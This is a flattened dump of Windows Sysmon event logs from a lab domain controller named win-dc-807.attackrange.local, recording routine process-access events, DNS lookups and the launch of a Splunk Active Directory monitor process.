15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006859Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006858Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006857Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000006876Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.252{D28789B6-7C64-5FA1-1200-000000008801}1216win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000006878Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:45.704{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000006877Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:45.696{D28789B6-7C62-5FA1-0B00-000000008801}868DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000006905Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.984{D28789B6-7DD7-5FA1-8001-000000008801}40404492C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006904Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7DD7-5FA1-8001-000000008801}4040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006903Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006902Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006901Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006900Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006899Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006898Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006897Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006896Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006895Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006894Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7DD7-5FA1-8001-000000008801}4040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006893Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.859{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7DD7-5FA1-8001-000000008801}4040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006892Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.860{D28789B6-7DD7-5FA1-8001-000000008801}4040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006891Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7DD7-5FA1-7F01-000000008801}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006890Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006889Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006888Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006887Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006886Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006885Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006884Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 